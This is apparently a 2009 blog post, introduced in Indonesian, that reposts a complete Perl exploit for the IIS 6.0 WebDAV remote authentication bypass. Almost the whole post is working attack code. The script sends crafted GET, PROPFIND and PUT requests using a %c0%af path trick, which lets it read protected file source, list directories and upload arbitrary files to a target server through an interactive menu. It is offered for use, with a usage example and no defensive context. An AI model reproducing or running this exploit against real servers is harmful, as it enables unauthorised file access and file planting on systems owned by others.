Another exploit code for IIS 6.0 Webdav bugs on Perl

Posted by xbox
May 27, 2009

Versi lain dari Exploit Untuk IIS 6.0 WebDAV Remote Authentication Bypass bugs yang juga ditulis dalam bahasa perl, ditulis oleh ka0x (ka0x01[alt+64]gmail.com).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117

#!/usr/bin/perl -W
#
# Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
# written by ka0x <ka0x01[alt+64]gmail.com>
#
# Greets: an0de, Piker, xarnuz, NullWave07, Pepelux, k0rde, JoSs, Trancek and others!
 
use IO::Socket ;
 
my ( $host, $path ) = @ARGV ;
my $port = 80 ; # webserver port
 
&usage unless $ARGV[1] ;
 
$host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ;
$path =~ s/\/// if(substr($path, 0,1) eq '/');
 
sub _file {
	$file = shift ;
	open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ;
	while( <FILE> ){
		$cont .= $_ ;
	}
	close(FILE) ;
	return $cont ;
}
 
 
print "write 'help' for get help list\n";
 
 
while( 1 ) {
 
	my $sock = IO::Socket::INET->new (PeerAddr => $host, 
					PeerPort => $port,
					Proto    => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
	print "\$> ";
	chomp( my $option = <STDIN> ) ;
	last if $option eq 'quit' ;
 
	if($option eq 'source') {
		$path =~ s/\//%c0%af\// ; 
		print $sock "GET /".$path." HTTP/1.1\r\n" ; 
		print $sock "Translate: f\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock "Connection: close\r\n\r\n" ;
 
		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}
 
 
	elsif($option eq 'path') {
		$path =~ s/\//%c0%af\// ;
		print $sock "PROPFIND  /".$path." HTTP/1.1\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock "Connection:close\r\n" ;
		print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
		print $sock "Content-Length: 0\r\n\r\n" ;
		print $sock  '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:prop xmlns:R="http://www.foo.bar/boxschema/"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>' ;
 
		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}
 
 
	elsif($option eq 'put') {
		$path =~ s/\//%c0%af\// ;
		print "[*] Insert a local file (ex: /root/file.txt): " ;
		chomp( $local = <STDIN> ) ;
		$file_l = _file( $local ) ;
		print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
		print $sock "Host: ".$host."\r\n" ;
		print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
		print $sock "Connection:close\r\n" ;
		print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
		print $sock $file_l,"\r\n" ;
 
		while(<$sock>){
			print $_ ;
		}
		close($sock) ;
	}
 
	elsif($option eq 'help') {
		print "\n\t\t- OPTIONS -\n\n\n" ;
		print "\thelp\t\tgive this help list\n" ;
		print "\tsource\t\tget file content\n" ;
		print "\tpath\t\tget directory contents\n" ;
		print "\tput\t\tput file\n" ;
		print "\tquit\t\texit exploit\n\n" ;
	}
 
}
 
sub usage {
	print << 'EOH' ;
 
  $ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
  $ written by ka0x <ka0x01[at]gmail.com>
  $ 25/05/2009
 
usage:
   perl $0 <host> <path>
 
example:
   perl $0 localhost dir/
   perl $0 localhost dir/file.txt
 
EOH
 
	exit;
}


Popular Posts
  • Digg
  • Delicious
  • StumbleUpon
  • Share/Bookmark
security

Did you enjoy this post? Why not leave a comment below and continue the conversation, or subscribe to my feed and get articles like this delivered automatically to your feed reader.

Comments

No comments yet.

Leave a comment

(required)

(required)